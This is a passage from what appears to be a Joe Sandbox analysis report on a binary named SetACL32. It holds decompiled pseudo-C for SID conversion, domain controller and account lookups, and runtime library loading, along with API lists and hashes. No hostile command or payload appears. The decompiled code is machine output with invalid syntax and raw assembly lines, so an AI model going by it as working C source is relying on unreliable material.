																if(_t400 < 8) {
																	L85:
																	_t395 = _v96;
																	_v124 = 0;
																	_v120 = 7;
																	_v140 = 0;
																	__eflags = _t395 - 8;
																	if(_t395 < 8) {
																		L89:
																		_t343 = _v72;
																		goto L90;
																	} else {
																		_t369 = _v116;
																		_t395 = 2 + _t395 * 2;
																		_t248 = _t369;
																		__eflags = _t395 - 0x1000;
																		if(_t395 < 0x1000) {
																			L88:
																			_push(_t395);
																			E012CAE27(_t369);
																			_t437 = _t437 + 8;
																			goto L89;
																		} else {
																			_t360 =  *(_t369 - 4);
																			_t395 = _t395 + 0x23;
																			__eflags = _t248 - _t360 + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L100;
																			} else {
																				goto L88;
																			}
																		}
																	}
																} else {
																	_t370 = _v140;
																	_t401 = 2 + _t400 * 2;
																	_t252 = _t370;
																	__eflags = _t401 - 0x1000;
																	if(_t401 < 0x1000) {
																		L84:
																		_push(_t401);
																		E012CAE27(_t370);
																		_t437 = _t437 + 8;
																		goto L85;
																	} else {
																		_t360 =  *(_t370 - 4);
																		_t395 = _t401 + 0x23;
																		__eflags = _t252 - _t360 + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L100;
																		} else {
																			goto L84;
																		}
																	}
																}
															} else {
																_t371 = _v68;
																_t402 = 2 + _t399 * 2;
																_t256 = _t371;
																__eflags = _t402 - 0x1000;
																if(_t402 < 0x1000) {
																	L80:
																	_push(_t402);
																	E012CAE27(_t371);
																	_t437 = _t437 + 8;
																	goto L81;
																} else {
																	_t360 =  *(_t371 - 4);
																	_t395 = _t402 + 0x23;
																	__eflags = _t256 - _t360 + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L100;
																	} else {
																		goto L80;
																	}
																}
															}
														} else {
															__eflags = _t416 - 0x534;
															if(_t416 != 0x534) {
																__eflags = _t416 - 0x6ba;
																if(_t416 != 0x6ba) {
																	goto L77;
																} else {
																	_v44 = 0;
																	_t372 =  &_v44;
																	_v28 = 0;
																	_v24 = 7;
																	_v44 = 0;
																	E012A1EE0(_t343, _t372, _t398, _t416, _t424, 0x12f983c, 0);
																	_push(_t372);
																	_v8 = 0xa;
																	_t263 = E012C8D30( &_v44, _t424,  &_v68, _t343);
																	_t404 = _v24;
																	_t437 = _t437 + 0xc;
																	_t416 = _t263;
																	__eflags = _t404 - 8;
																	if(_t404 < 8) {
																		goto L77;
																	} else {
																		_t374 = _v44;
																		_t405 = 2 + _t404 * 2;
																		_t264 = _t374;
																		__eflags = _t405 - 0x1000;
																		if(_t405 < 0x1000) {
																			L76:
																			_push(_t405);
																			E012CAE27(_t374);
																			_t437 = _t437 + 8;
																			goto L77;
																		} else {
																			_t360 =  *(_t374 - 4);
																			_t395 = _t405 + 0x23;
																			__eflags = _t264 - _t360 + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L99;
																			} else {
																				goto L76;
																			}
																		}
																	}
																}
															} else {
																_push(_t355);
																_t270 = E012C8D30( &_v92,  &_v116,  &_v68, _t343);
																_t437 = _t437 + 0xc;
																_t416 = _t270;
																goto L77;
															}
														}
													} else {
														E012983B0( &_v44,  &_v92);
														_v8 = 7;
														E012983B0( &_v68,  &_v44);
														_v8 = 8;
														__eflags = _v72 - 8;
														_v76 = 0;
														_t276 =  >=  ? _v92 :  &_v92;
														 *((short*)( >=  ? _v92 :  &_v92)) = 0;
														__eflags = _v48 - 8;
														_v156 = 0;
														_t354 =  &_v156;
														_t278 =  >=  ? _v68 :  &_v68;
														__imp__DsGetDcNameW(0, _t278, 0, 0, 0, _t354);
														_t343 = _t278;
														__eflags = _t343;
														if(_t343 == 0) {
															_t410 =  *_v156;
															_t380 =  *_v156;
															_t416 = _t380 + 2;
															do {
																_t291 =  *_t380;
																_t380 = _t380 + 2;
																__eflags = _t291;
															} while (_t291 != 0);
															E012A1EE0(_t343,  &_v92, _t410, _t416, _t424, _t410, _t380 - _t416 >> 1);
															_t446 = _t437 - 0x14;
															_v148 = _t446;
															_v152 = "\\";
															_v148 = 0x12fc3e6;
															E0129A2D0(_t446,  &_v152);
															_t354 =  &_v92;
															E012AABF0(_t354);
															_t296 = _v156;
															_t437 = _t446 + 0x14;
															__eflags = _t296;
															if(_t296 != 0) {
																NetApiBufferFree(_t296);
															}
														}
														_v8 = 7;
														_t407 = _v48;
														__eflags = _t407 - 8;
														if(_t407 < 8) {
															L63:
															__eflags = _t343;
															if(_t343 != 0) {
																__eflags = _v24 - 8;
																_t284 =  >=  ? _v44 :  &_v44;
																_t354 =  &_v92;
																E012A1EE0(_t343, _t354, _t407, _t416, _t424,  >=  ? _v44 :  &_v44, _v28);
															}
															_v8 = 4;
															_t408 = _v24;
															__eflags = _t408 - 8;
															if(_t408 < 8) {
																goto L69;
															} else {
																_t354 = _v44;
																_t409 = 2 + _t408 * 2;
																_t279 = _t354;
																__eflags = _t409 - 0x1000;
																if(_t409 < 0x1000) {
																	L68:
																	_push(_t409);
																	E012CAE27(_t354);
																	_t437 = _t437 + 8;
																	goto L69;
																} else {
																	_t360 =  *(_t354 - 4);
																	_t395 = _t409 + 0x23;
																	__eflags = _t279 - _t360 + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L100;
																	} else {
																		goto L68;
																	}
																}
															}
														} else {
															_t354 = _v68;
															_t407 = 2 + _t407 * 2;
															_t286 = _t354;
															__eflags = _t407 - 0x1000;
															if(_t407 < 0x1000) {
																L62:
																_push(_t407);
																E012CAE27(_t354);
																_t437 = _t437 + 8;
																goto L63;
															} else {
																_t360 =  *(_t354 - 4);
																_t395 = _t407 + 0x23;
																__eflags = _t286 - _t360 + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L98;
																} else {
																	goto L62;
																}
															}
														}
													}
												} else {
													_t354 = _v68;
													_t413 = 2 + _t397 * 2;
													_t304 = _t354;
													__eflags = _t413 - 0x1000;
													if(_t413 < 0x1000) {
														L43:
														_push(_t413);
														E012CAE27(_t354);
														_t437 = _t437 + 8;
														goto L44;
													} else {
														_t360 =  *(_t354 - 4);
														_t395 = _t413 + 0x23;
														__eflags = _t304 - _t360 + 0xfffffffc - 0x1f;
														if(__eflags > 0) {
															L97:
															E012CF35F(_t342, _t360, _t395, __eflags);
															L98:
															E012CF35F(_t343, _t360, _t395, __eflags);
															L99:
															E012CF35F(_t343, _t360, _t395, __eflags);
															goto L100;
														} else {
															goto L43;
														}
													}
												}
											} else {
												_t394 = _v44;
												_t395 = 2 + _t395 * 2;
												_t326 = _t394;
												__eflags = _t395 - 0x1000;
												if(__eflags < 0) {
													L36:
													_push(_t395);
													E012CAE27(_t394);
													_t436 = _t436 + 8;
													goto L38;
												} else {
													_t360 =  *(_t394 - 4);
													_t395 = _t395 + 0x23;
													__eflags = _t326 - _t360 + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														goto L100;
													} else {
														goto L36;
													}
												}
											}
										}
									} else {
										_t360 = _v44;
										_t395 = 2 + _t395 * 2;
										_t330 = _t360;
										__eflags = _t395 - 0x1000;
										if(_t395 < 0x1000) {
											L29:
											_push(_t395);
											E012CAE27(_t360);
											_t437 = _t436 + 8;
											goto L30;
										} else {
											_t360 =  *(_t360 - 4);
											_t395 = _t395 + 0x23;
											__eflags = _t330 - _t360 + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												goto L100;
											} else {
												goto L29;
											}
										}
									}
								} else {
									_t416 = 0x57;
									L90:
									_v100 = 0;
									_v96 = 7;
									_v116 = 0;
									__eflags = _t343 - 8;
									if(_t343 < 8) {
										L94:
										_t230 = _t416;
										goto L95;
									} else {
										_t360 = _v92;
										_t395 = 2 + _t343 * 2;
										_t232 = _t360;
										__eflags = _t395 - 0x1000;
										if(_t395 < 0x1000) {
											L93:
											_push(_t395);
											E012CAE27(_t360);
											goto L94;
										} else {
											_t360 =  *(_t360 - 4);
											_t395 = _t395 + 0x23;
											__eflags = _t232 - _t360 + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												L100:
												E012CF35F(_t343, _t360, _t395, __eflags);
												asm("int3");
												asm("int3");
												asm("int3");
												_t345 = _t437;
												_v204 =  *((intOrPtr*)(_t345 + 4));
												_t433 = (_t437 - 0x00000008 & 0xfffffff8) + 4;
												_t238 =  *0x1309018; // 0xedd8d3b4
												_t239 = _t238 ^ _t433;
												_v228 = _t239;
												 *[fs:0x0] =  &_v220;
												_t426 =  *(_t345 + 8);
												_v256 = _t426;
												_v252 = 0;
												_v236 = 0;
												_v232 = 7;
												_v252 = 0;
												_v212 = 0;
												_v256 = 0;
												_t242 =  &_v256;
												__imp__ConvertSidToStringSidW( *_t360, _t242, _t239, _t416, _t424, _t345,  *[fs:0x0], 0x12ecbfd, 0xffffffff, _t430, _t343);
												__eflags = _t242;
												if(_t242 != 0) {
													_t395 = _v64;
													__eflags = _t395;
													if(_t395 != 0) {
														_t365 = _t395;
														_t419 = _t365 + 2;
														do {
															_t245 =  *_t365;
															_t365 = _t365 + 2;
															__eflags = _t245;
														} while (_t245 != 0);
														__eflags = _t365 - _t419;
														E012A1EE0(_t345,  &_v60, _t395, _t419, _t426, _t395, _t365 - _t419 >> 1);
														LocalFree(_v64);
													}
												}
												asm("movups xmm0, [ebp-0x2c]");
												 *_t426 = 0;
												_t426[4] = 0;
												_t426[5] = 0;
												asm("movups [esi], xmm0");
												asm("movq xmm0, [ebp-0x1c]");
												asm("movq [esi+0x10], xmm0");
												 *[fs:0x0] = _v28;
												_pop(_t418);
												_pop(_t427);
												__eflags = _v36 ^ _t433;
												return E012CAE19(_t426, _t345, _v36 ^ _t433, _t395, _t418, _t427);
											} else {
												goto L93;
											}
										}
									}
								}
							}
						}
					}
				} else {
					_t422 = _v164;
					if(_t422 == 0 || IsValidSid(_t422) == 0) {
						L10:
						_t428 = 0;
					} else {
						_t348 = GetLengthSid(_t422);
						_push(1);
						_push(_t348);
						_t428 = E012D4006();
						if(_t428 == 0) {
							goto L10;
						} else {
							if(CopySid(_t348, _t428, _t422) == 0) {
								E012D3434(_t428);
								goto L10;
							}
						}
					}
					 *_v168 = _t428;
					LocalFree(_v164);
					_t230 = 0;
					L95:
					 *[fs:0x0] = _v16;
					_pop(_t417);
					_pop(_t425);
					_pop(_t344);
					return E012CAE19(_t230, _t344, _v20 ^ _t430, _t395, _t417, _t425);
				}
			}





























































































































              0x012c7950
              0x012c7951
              0x012c7953
              0x012c7955
              0x012c7960
              0x012c7961
              0x012c7967
              0x012c796c
              0x012c796e
              0x012c7974
              0x012c7978
              0x012c797e
              0x012c7980
              0x012c7986
              0x012c798b
              0x012c7991
              0x012c7997
              0x012c799b
              0x012c799e
              0x012c79a3
              0x012c79a6
              0x012c79a6
              0x012c79b0
              0x012c79b2
              0x012c79b4
              0x012c79b4
              0x012c79be
              0x012c79c6
              0x012c7a2a
              0x012c7a2f
              0x012c7a38
              0x012c7a3f
              0x012c7a42
              0x012c7a46
              0x012c7a49
              0x012c7a4c
              0x012c7a4f
              0x012c7a52
              0x012c7a56
              0x012c7a5a
              0x012c7a5c
              0x012c7a60
              0x012c7a60
              0x012c7a63
              0x012c7a69
              0x012c7a6b
              0x012c7a6d
              0x012c7a6d
              0x012c7a73
              0x012c7a75
              0x012c7bd4
              0x012c7bd4
              0x00000000
              0x012c7a7b
              0x012c7a7b
              0x012c7a85
              0x012c7a89
              0x012c7a9f
              0x012c7a9f
              0x00000000
              0x012c7a90
              0x012c7a90
              0x012c7a93
              0x00000000
              0x00000000
              0x012c7a95
              0x012c7a98
              0x012c7a99
              0x012c7a9d
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c7a9d
              0x012c7a90
              0x012c7aa1
              0x012c7aa1
              0x012c7aa3
              0x00000000
              0x012c7aa9
              0x012c7aaf
              0x012c7ab1
              0x012c7ab4
              0x00000000
              0x012c7aba
              0x012c7aba
              0x012c7aba
              0x012c7abd
              0x012c7ac0
              0x012c7ac2
              0x012c7ace
              0x012c7ad0
              0x012c7ad9
              0x012c7ae0
              0x012c7ae3
              0x012c7aea
              0x012c7aee
              0x012c7af0
              0x012c7af2
              0x012c7af2
              0x012c7af9
              0x012c7b02
              0x012c7b05
              0x012c7b0a
              0x012c7b0d
              0x012c7b10
              0x012c7b44
              0x012c7b44
              0x012c7b44
              0x012c7b47
              0x012c7b48
              0x012c7b4f
              0x012c7b56
              0x012c7b5d
              0x012c7b5f
              0x012c80a4
              0x00000000
              0x012c7b65
              0x012c7b65
              0x012c7b6a
              0x012c7b6d
              0x012c7b70
              0x012c7b74
              0x012c7b76
              0x012c7b78
              0x012c7b78
              0x012c7b82
              0x012c7b8a
              0x012c7b93
              0x012c7b98
              0x012c7b9b
              0x012c7b9e
              0x012c7bda
              0x012c7bdd
              0x012c7be2
              0x012c7be4
              0x012c7be6
              0x012c7bed
              0x012c7bf4
              0x012c7bf8
              0x012c7bfa
              0x012c7bfa
              0x012c7c01
              0x012c7c0d
              0x012c7c10
              0x012c7c17
              0x012c7c1e
              0x012c7c22
              0x012c7c27
              0x012c7c2b
              0x012c7c2f
              0x012c7c35
              0x012c7c3a
              0x012c7c3d
              0x012c7c41
              0x012c7c44
              0x012c7c47
              0x012c7c7b
              0x012c7c7d
              0x012c7c84
              0x012c7c8b
              0x012c7c8f
              0x012c7c92
              0x012c7cdc
              0x00000000
              0x012c7c94
              0x012c7c94
              0x012c7c96
              0x012c7c9f
              0x012c7ca4
              0x012c7cb0
              0x012c7cb4
              0x012c7cba
              0x012c7cbb
              0x012c7cc1
              0x012c7cc7
              0x012c7ccc
              0x012c7ccf
              0x012c7cd1
              0x012c7ce2
              0x012c7ce2
              0x012c7cd3
              0x012c7cd3
              0x012c7cd3
              0x012c7cd1
              0x012c7ce9
              0x012c7cf0
              0x012c7cf3
              0x012c7cf5
              0x012c7cf7
              0x012c7cfb
              0x012c7cfd
              0x012c7d00
              0x012c7d02
              0x012c7d0a
              0x012c7d0c
              0x012c7d0c
              0x012c7d02
              0x012c7cf7
              0x012c7d0e
              0x012c7d15
              0x012c7e87
              0x012c7e89
              0x012c7e90
              0x012c7e97
              0x012c7e9e
              0x012c7ea2
              0x012c7eab
              0x012c7eae
              0x012c7eb0
              0x012c7eb4
              0x012c7eb7
              0x012c7ebc
              0x012c7ebf
              0x012c7ec1
              0x012c7ec5
              0x012c7f72
              0x012c7f72
              0x012c7f75
              0x012c7f78
              0x012c7fac
              0x012c7fac
              0x012c7faf
              0x012c7fb2
              0x012c7fe9
              0x012c7fe9
              0x012c7fee
              0x012c7ff5
              0x012c7ffc
              0x012c8003
              0x012c8006
              0x012c803a
              0x012c803a
              0x00000000
              0x012c8008
              0x012c8008
              0x012c800b
              0x012c8012
              0x012c8014
              0x012c801a
              0x012c8030
              0x012c8030
              0x012c8032
              0x012c8037
              0x00000000
              0x012c801c
              0x012c801c
              0x012c801f
              0x012c8027
              0x012c802a
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c802a
              0x012c801a
              0x012c7fb4
              0x012c7fb4
              0x012c7fba
              0x012c7fc1
              0x012c7fc3
              0x012c7fc9
              0x012c7fdf
              0x012c7fdf
              0x012c7fe1
              0x012c7fe6
              0x00000000
              0x012c7fcb
              0x012c7fcb
              0x012c7fce
              0x012c7fd6
              0x012c7fd9
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c7fd9
              0x012c7fc9
              0x012c7f7a
              0x012c7f7a
              0x012c7f7d
              0x012c7f84
              0x012c7f86
              0x012c7f8c
              0x012c7fa2
              0x012c7fa2
              0x012c7fa4
              0x012c7fa9
              0x00000000
              0x012c7f8e
              0x012c7f8e
              0x012c7f91
              0x012c7f99
              0x012c7f9c
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c7f9c
              0x012c7f8c
              0x012c7ecb
              0x012c7ecb
              0x012c7ed1
              0x012c7eee
              0x012c7ef4
              0x00000000
              0x012c7ef6
              0x012c7ef8
              0x012c7f05
              0x012c7f08
              0x012c7f0f
              0x012c7f16
              0x012c7f1a
              0x012c7f1f
              0x012c7f23
              0x012c7f2e
              0x012c7f33
              0x012c7f36
              0x012c7f39
              0x012c7f3b
              0x012c7f3e
              0x00000000
              0x012c7f40
              0x012c7f40
              0x012c7f43
              0x012c7f4a
              0x012c7f4c
              0x012c7f52
              0x012c7f68
              0x012c7f68
              0x012c7f6a
              0x012c7f6f
              0x00000000
              0x012c7f54
              0x012c7f54
              0x012c7f57
              0x012c7f5f
              0x012c7f62
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c7f62
              0x012c7f52
              0x012c7f3e
              0x012c7ed3
              0x012c7ed3
              0x012c7edf
              0x012c7ee4
              0x012c7ee7
              0x00000000
              0x012c7ee7
              0x012c7ed1
              0x012c7d1b
              0x012c7d22
              0x012c7d2a
              0x012c7d32
              0x012c7d37
              0x012c7d3e
              0x012c7d42
              0x012c7d49
              0x012c7d4f
              0x012c7d55
              0x012c7d59
              0x012c7d5f
              0x012c7d65
              0x012c7d73
              0x012c7d79
              0x012c7d7b
              0x012c7d7d
              0x012c7d85
              0x012c7d87
              0x012c7d89
              0x012c7d90
              0x012c7d90
              0x012c7d93
              0x012c7d96
              0x012c7d96
              0x012c7da4
              0x012c7da9
              0x012c7db4
              0x012c7dba
              0x012c7dc5
              0x012c7dcf
              0x012c7dd4
              0x012c7dd7
              0x012c7ddc
              0x012c7de2
              0x012c7de5
              0x012c7de7
              0x012c7dea
              0x012c7dea
              0x012c7de7
              0x012c7df0
              0x012c7df4
              0x012c7df7
              0x012c7dfa
              0x012c7e2e
              0x012c7e2e
              0x012c7e30
              0x012c7e32
              0x012c7e3c
              0x012c7e40
              0x012c7e44
              0x012c7e44
              0x012c7e49
              0x012c7e4d
              0x012c7e50
              0x012c7e53
              0x00000000
              0x012c7e55
              0x012c7e55
              0x012c7e58
              0x012c7e5f
              0x012c7e61
              0x012c7e67
              0x012c7e7d
              0x012c7e7d
              0x012c7e7f
              0x012c7e84
              0x00000000
              0x012c7e69
              0x012c7e69
              0x012c7e6c
              0x012c7e74
              0x012c7e77
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c7e77
              0x012c7e67
              0x012c7dfc
              0x012c7dfc
              0x012c7dff
              0x012c7e06
              0x012c7e08
              0x012c7e0e
              0x012c7e24
              0x012c7e24
              0x012c7e26
              0x012c7e2b
              0x00000000
              0x012c7e10
              0x012c7e10
              0x012c7e13
              0x012c7e1b
              0x012c7e1e
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c7e1e
              0x012c7e0e
              0x012c7dfa
              0x012c7c49
              0x012c7c49
              0x012c7c4c
              0x012c7c53
              0x012c7c55
              0x012c7c5b
              0x012c7c71
              0x012c7c71
              0x012c7c73
              0x012c7c78
              0x00000000
              0x012c7c5d
              0x012c7c5d
              0x012c7c60
              0x012c7c68
              0x012c7c6b
              0x012c80a9
              0x012c80a9
              0x012c80ae
              0x012c80ae
              0x012c80b3
              0x012c80b3
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c7c6b
              0x012c7c5b
              0x012c7ba0
              0x012c7ba0
              0x012c7ba3
              0x012c7baa
              0x012c7bac
              0x012c7bb2
              0x012c7bc8
              0x012c7bc8
              0x012c7bca
              0x012c7bcf
              0x00000000
              0x012c7bb4
              0x012c7bb4
              0x012c7bb7
              0x012c7bbf
              0x012c7bc2
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c7bc2
              0x012c7bb2
              0x012c7b9e
              0x012c7b12
              0x012c7b12
              0x012c7b15
              0x012c7b1c
              0x012c7b1e
              0x012c7b24
              0x012c7b3a
              0x012c7b3a
              0x012c7b3c
              0x012c7b41
              0x00000000
              0x012c7b26
              0x012c7b26
              0x012c7b29
              0x012c7b31
              0x012c7b34
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c7b34
              0x012c7b24
              0x012c7ac4
              0x012c7ac4
              0x012c803d
              0x012c803f
              0x012c8046
              0x012c804d
              0x012c8051
              0x012c8054
              0x012c8084
              0x012c8084
              0x00000000
              0x012c8056
              0x012c8056
              0x012c8059
              0x012c8060
              0x012c8062
              0x012c8068
              0x012c807a
              0x012c807a
              0x012c807c
              0x00000000
              0x012c806a
              0x012c806a
              0x012c806d
              0x012c8075
              0x012c8078
              0x012c80b8
              0x012c80b8
              0x012c80bd
              0x012c80be
              0x012c80bf
              0x012c80c1
              0x012c80d0
              0x012c80d4
              0x012c80e8
              0x012c80ed
              0x012c80ef
              0x012c80f8
              0x012c80fe
              0x012c8103
              0x012c8106
              0x012c810d
              0x012c8114
              0x012c811b
              0x012c811f
              0x012c8122
              0x012c8125
              0x012c812b
              0x012c8131
              0x012c8133
              0x012c8135
              0x012c8138
              0x012c813a
              0x012c813c
              0x012c813e
              0x012c8141
              0x012c8141
              0x012c8144
              0x012c8147
              0x012c8147
              0x012c814c
              0x012c8155
              0x012c815d
              0x012c815d
              0x012c813a
              0x012c8163
              0x012c8167
              0x012c816f
              0x012c8176
              0x012c817d
              0x012c8180
              0x012c8185
              0x012c818d
              0x012c8195
              0x012c8196
              0x012c819a
              0x012c81a7
              0x00000000
              0x00000000
              0x00000000
              0x012c8078
              0x012c8068
              0x012c8054
              0x012c7ac2
              0x012c7ab4
              0x012c7aa3
              0x012c79c8
              0x012c79c8
              0x012c79d0
              0x012c7a0d
              0x012c7a0d
              0x012c79dd
              0x012c79e4
              0x012c79e6
              0x012c79e8
              0x012c79ee
              0x012c79f5
              0x00000000
              0x012c79f7
              0x012c7a02
              0x012c7a05
              0x00000000
              0x012c7a0a
              0x012c7a02
              0x012c79f5
              0x012c7a1b
              0x012c7a1d
              0x012c7a23
              0x012c8086
              0x012c8089
              0x012c8091
              0x012c8092
              0x012c8093
              0x012c80a1
              0x012c80a1

              APIs
              • ConvertStringSidToSidW.ADVAPI32(012FC3E4,?), ref: 012C79BE
              • IsValidSid.ADVAPI32(?), ref: 012C79D3
              • GetLengthSid.ADVAPI32(?), ref: 012C79DE
              • CopySid.ADVAPI32(00000000,00000000,?), ref: 012C79FA
              • LocalFree.KERNEL32(?), ref: 012C7A1D
                • Part of subcall function 012D3434: _free.LIBCMT ref: 012D3447
              • std::locale::_Init.LIBCPMT ref: 012C7C9A
              • DsGetDcNameW.NETAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 012C7D73
              • NetApiBufferFree.NETAPI32(?), ref: 012C7DEA
                • Part of subcall function 012C8D30: LookupAccountNameW.ADVAPI32(00000000,012FC3E4,00000000,?,00000000,012C7EBC,?), ref: 012C8DAE
                • Part of subcall function 012C8D30: GetLastError.KERNEL32(?,?,?,?,00000000,012ECD15,000000FF,?,012C7EBC,00000000,?), ref: 012C8DBA
                • Part of subcall function 012C8D30: GetLastError.KERNEL32(?,?,?,?,00000000,012ECD15,000000FF,?,012C7EBC,00000000,?), ref: 012C8DC1
              • ConvertSidToStringSidW.ADVAPI32(?,?), ref: 012C812B
              • LocalFree.KERNEL32(?,?,?,?,?), ref: 012C815D
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: Free$ConvertErrorLastLocalNameString$AccountBufferCopyInitLengthLookupValid_freestd::locale::_
              • String ID: computername
              • API String ID: 3069089176-1800712684
              • Opcode ID: 3dc8ffabb0e4b4388df7c41d7aee0bc184af5a8b3a5d6441024d1b04cebc341d
              • Instruction ID: a7d7902c42cf713db41d87a591c175073cd79883ac3042b341f52f2be71b8464
              • Opcode Fuzzy Hash: 3dc8ffabb0e4b4388df7c41d7aee0bc184af5a8b3a5d6441024d1b04cebc341d
              • Instruction Fuzzy Hash: 4732F371A202099FDB14DFA8CC84BEEBBB5FF94714F14825CD605AB291EB35AA44CF50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012DA48C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 547 12da48c-12da498 548 12da53f-12da542 547->548 549 12da49d-12da4ae 548->549 550 12da548 548->550 552 12da4bb-12da4d4 LoadLibraryExW 549->552 553 12da4b0-12da4b3 549->553 551 12da54a-12da54e 550->551 556 12da526-12da52f 552->556 557 12da4d6-12da4df 552->557 554 12da53c 553->554 555 12da4b9 553->555 554->548 558 12da538-12da53a 555->558 556->558 559 12da531-12da532 FreeLibrary 556->559 562 12da516 557->562 563 12da4e1-12da4f3 call 12d6ea8 557->563 558->554 560 12da54f-12da551 558->560 559->558 560->551 565 12da518-12da51a 562->565 563->562 568 12da4f5-12da507 call 12d6ea8 563->568 565->556 567 12da51c-12da524 565->567 567->554 568->562 571 12da509-12da514 LoadLibraryExW 568->571 571->565
              C-Code - Quality: 100%
              			E012DA48C(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t13;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x130b260 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x12f2a28 + _t22 * 4);
						_t13 = LoadLibraryExW(_t23, 0, 0x800); // executed
						_t32 = _t13;
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E012D6EA8(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E012D6EA8(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}














              0x012da495
              0x012da53f
              0x012da49d
              0x012da49f
              0x012da4a6
              0x012da4a8
              0x012da4ae
              0x012da4bb
              0x012da4ca
              0x012da4d0
              0x012da4d4
              0x012da526
              0x012da526
              0x012da52b
              0x012da52f
              0x012da532
              0x012da532
              0x012da538
              0x012da53a
              0x012da54f
              0x012da54a
              0x012da54e
              0x012da54e
              0x012da53c
              0x012da53c
              0x00000000
              0x012da53c
              0x012da4d6
              0x012da4df
              0x012da516
              0x012da516
              0x012da518
              0x012da51a
              0x00000000
              0x00000000
              0x012da522
              0x00000000
              0x012da522
              0x012da4e9
              0x012da4ee
              0x012da4f3
              0x00000000
              0x00000000
              0x012da4fd
              0x012da502
              0x012da507
              0x00000000
              0x00000000
              0x012da50c
              0x012da512
              0x00000000
              0x012da512
              0x012da4b3
              0x00000000
              0x00000000
              0x00000000
              0x012da4b9
              0x012da548
              0x00000000

              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID:
              • String ID: @Mhv$api-ms-$ext-ms-
              • API String ID: 0-1203984242
              • Opcode ID: 91b168742d805cb2459107d38374c8ee00715d98bef75aaed5252a7236c8ee0b
              • Instruction ID: 1267f8659aa94a41f93df4261ab83f59e13d14bdfb5bf6ebc7686b4d859822c2
              • Opcode Fuzzy Hash: 91b168742d805cb2459107d38374c8ee00715d98bef75aaed5252a7236c8ee0b
              • Instruction Fuzzy Hash: 3A21B732E21222ABDB329B68FC45E2A7B989F41770F554165EE46BB281D770ED0087E0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012D036B Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
